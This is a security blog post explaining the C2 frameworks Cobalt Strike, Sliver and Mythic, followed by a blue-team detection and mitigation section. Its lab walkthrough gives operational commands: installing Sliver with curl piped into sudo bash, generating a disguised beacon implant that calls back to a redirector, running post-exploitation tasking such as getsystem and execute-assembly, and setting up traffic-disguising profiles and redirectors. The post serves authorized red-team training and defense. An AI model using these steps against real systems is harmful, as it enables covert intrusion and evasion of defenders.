C2 Frameworks Explained: Cobalt Strike, Sliver, and Mythic

Malware & C2
2025.10.20
Time it takes to read this article 5 minutes.

Legal & ethical notice. This article is for education and authorized security testing only. Operating a Command-and-Control (C2) framework against systems you do not own or for which you lack explicit written permission is illegal in most jurisdictions. Build the lab described here on isolated, disposable infrastructure.

Introduction / Overview

A Command-and-Control (C2) framework is the operator's nervous system during a red-team engagement. After an initial foothold, the framework manages implants, routes tasking, exfiltrates data, and (ideally) blends into normal network traffic. Three frameworks dominate real-world tradecraft:

  • Cobalt Strike — commercial (Fortra), the long-standing industry standard. Its Beacon implant and Malleable C2 profiles set the bar for traffic shaping.
  • Sliver — open source (Bishop Fox), written in Go. Cross-platform implants, mTLS/WireGuard/HTTP(S)/DNS transports, and no per-seat licensing.
  • Mythic — open source (Cody Thomas / SpecterOps), a Docker-based, plugin-driven framework where agents and C2 profiles are containers you mix and match.

This post explains the shared vocabulary — beacon, listeners, malleable profiles, redirectors, OPSEC — and shows a minimal, lab-only walkthrough for each.

How it works / Background

Every modern C2 shares the same architecture: a team server that operators connect to, one or more listeners that accept implant traffic, and implants (Beacon, Sliver session/beacon, Mythic agent) running on the target.

Key concepts:

  • Beacon / implant. The code running on the victim. A beacon polls the server on an interval (asynchronous, low-and-slow) instead of holding an interactive socket. Cobalt Strike popularized the term; Sliver offers both interactive sessions and asynchronous beacons.
  • Listeners. Server-side endpoints bound to a transport (HTTP, HTTPS, DNS, SMB named pipe, TCP). The implant's payload is generated to match a listener.
  • Malleable profiles. Text configuration that reshapes C2 traffic — URIs, headers, User-Agent, and how tasks are encoded — so HTTP traffic mimics a legitimate service (jQuery CDN, Office365, etc.). This is Cobalt Strike's signature feature; Mythic's HTTP profile and Sliver's HTTP C2 config offer similar (if less granular) control.
  • Redirectors. Front-end hosts (Apache/Nginx mod_rewrite, or a cloud CDN for domain fronting) that proxy implant traffic to the hidden team server, protecting it from discovery and takedown.
  • OPSEC. Operational security: choosing sleep/jitter, avoiding noisy commands, using BOFs/execute-assembly instead of dropping binaries, and matching profiles to the target environment.

Prerequisites / Lab setup

Use an isolated VLAN or host-only network. Recommended:

  • A Linux VM for team servers (Debian/Ubuntu).
  • A Windows 10/11 VM as the target, with Sysmon + Windows Event Forwarding for blue-team visibility.
  • Docker + docker-compose (for Mythic).
  • Go 1.20+ if building Sliver from source.

Install Sliver and Mythic (both free):

# Sliver — one-line installer (server + client)
curl https://sliver.sh/install | sudo bash
systemctl status sliver

# Mythic — Docker-based
git clone https://github.com/its-a-feature/Mythic
cd Mythic
sudo make            # builds the mythic-cli
sudo ./mythic-cli start
Bash

Walkthrough / PoC

Sliver: listener, implant, and a beacon

Start the Sliver server console and create an HTTPS listener:

sliver

# inside the sliver console:
https --lport 443
jobs                      # confirm the listener is running
Bash

Generate an asynchronous beacon implant for Windows and host it:

# 60s callback, 30% jitter, mTLS-protected staging
generate beacon --http https://redirector.lab.local --os windows \
  --arch amd64 --seconds 60 --jitter 30 --save /tmp/update.exe

# list built implants
implants
Bash

After execution on the target, interact with it:

beacons                   # list checked-in beacons
use <beacon-id>
execute-assembly /opt/Seatbelt.exe -group=system
getsystem
Bash

Mythic: a containerized agent

In Mythic, you install an agent and a C2 profile as containers, then build a payload from the web UI (https://127.0.0.1:7443):

# install the Apollo (.NET) agent and the HTTP C2 profile
sudo ./mythic-cli install github https://github.com/MythicAgents/Apollo
sudo ./mythic-cli install github https://github.com/MythicC2Profiles/http

sudo ./mythic-cli start
Bash

From the UI you configure the HTTP profile callback host/interval, then build a payload. Tasking (shell whoami, inject, execute_assembly) is queued and the agent fetches it on its next callback.

Cobalt Strike: Beacon and a malleable profile

Cobalt Strike is licensed; assume you have a legitimate copy. Start the team server, then in the GUI create an HTTPS listener and generate a Beacon. The defining feature is the Malleable C2 profile — validate it before use:

# validate and run the team server with a profile (lab only)
./c2lint jquery-c2.4.5.profile
./teamserver 10.10.10.5 SuperSecretPass jquery-c2.4.5.profile
Bash

A trimmed profile fragment shaping the GET request to look like a CDN fetch:

http-get {
    set uri "/jquery-3.3.1.min.js";
    client {
        header "Host" "code.jquery.com";
        metadata {
            base64url;
            header "Cookie";
        }
    }
}
Plaintext

Redirector (applies to all three)

Front the team server with an Nginx redirector so the implant never touches the real server directly:

server {
    listen 443 ssl;
    server_name redirector.lab.local;

    location / {
        proxy_pass https://10.10.10.5:443;   # hidden team server
        proxy_ssl_verify off;
        proxy_set_header Host $host;
    }
}
Nginx

For deeper coverage of post-exploitation tradecraft, see my notes on Windows privilege escalation and in-memory .NET execution.

Mermaid diagram

C2 Frameworks Explained: Cobalt Strike, Sliver, and Mythic diagram 1

The implant calls a redirector (never the team server directly); the redirector proxies to the hidden server, which matches the listener and returns malleable-shaped tasking, while operators connect to the server out of band.

Detection & Defense (Blue Team)

C2 frameworks leave detectable artifacts at every layer. Defenders should weight these as heavily as the offense.

Network detection

  • JA3/JA3S and JARM fingerprinting. Default Cobalt Strike and Sliver TLS stacks have known JARM signatures. Pivot on rare JARM hashes in Zeek/Suricata logs.
  • Beacon timing analysis. Regular callback intervals with jitter still cluster statistically. Tools like RITA (Real Intelligence Threat Analytics) score beaconing on connection regularity and data-size consistency.
  • Default profile artifacts. Stock Malleable profiles and the infamous Cobalt Strike checksum8/4444-style stagers, plus the historical "extra null byte" Beacon staging bug, are widely signatured. Emerging Threats Suricata rules cover many defaults.
  • DNS C2. Flag high query volume to a single domain, long TXT/A responses, and high-entropy subdomains.

Host detection

  • Sysmon. Watch Event ID 1 (process create), 7 (image load), 8 (CreateRemoteThread), 10 (OpenProcess with PROCESS_VM_WRITE), 11 (file create), and 17/18 (named pipes — Cobalt Strike SMB Beacon historically used predictable pipe names like \\.\pipe\msagent_*).
  • Memory scanning. YARA rules from Elastic and Florian Roth (signature-base) detect Beacon/Sliver/Mythic implants in memory. Hunt-Sleeping-Beacons and BeaconHunter catch implants by inspecting threads in unbacked memory during sleep masking (Ekko/Foliage).
  • Injection telemetry. execute-assembly loads the CLR into a non-.NET process; alert on clr.dll/mscoree.dll loading into unexpected hosts (Sysmon EID 7).

Map to MITRE ATT&CK: T1071 (Application Layer Protocol), T1572 (Protocol Tunneling), T1090 (Proxy / redirectors), T1573 (Encrypted Channel), T1055 (Process Injection).

Mitigations

  • TLS inspection at the egress proxy plus strict allow-listing of outbound domains kills most domain-fronting and CDN-fronted C2.
  • Block direct outbound from servers/workstations; force traffic through an inspecting proxy.
  • Application allow-listing (WDAC/AppLocker) blocks dropped implant binaries.
  • Enable AMSI and script-block logging; deploy EDR with memory scanning rather than relying on signatures alone.

Conclusion

Cobalt Strike, Sliver, and Mythic solve the same problem with different trade-offs: Cobalt Strike gives unmatched traffic-shaping via Malleable C2; Sliver gives a free, Go-native, multi-transport implant; Mythic gives a modular, container-driven platform you extend with community agents. For operators, mastering listeners, malleable profiles, and redirectors is what separates a noisy demo from a stealthy operation. For defenders, the good news is that defaults are loud — JARM/JA3 fingerprints, beacon-timing analysis, and memory scanning catch the majority of real-world deployments. Know both sides.

References

Comments

Copied title and URL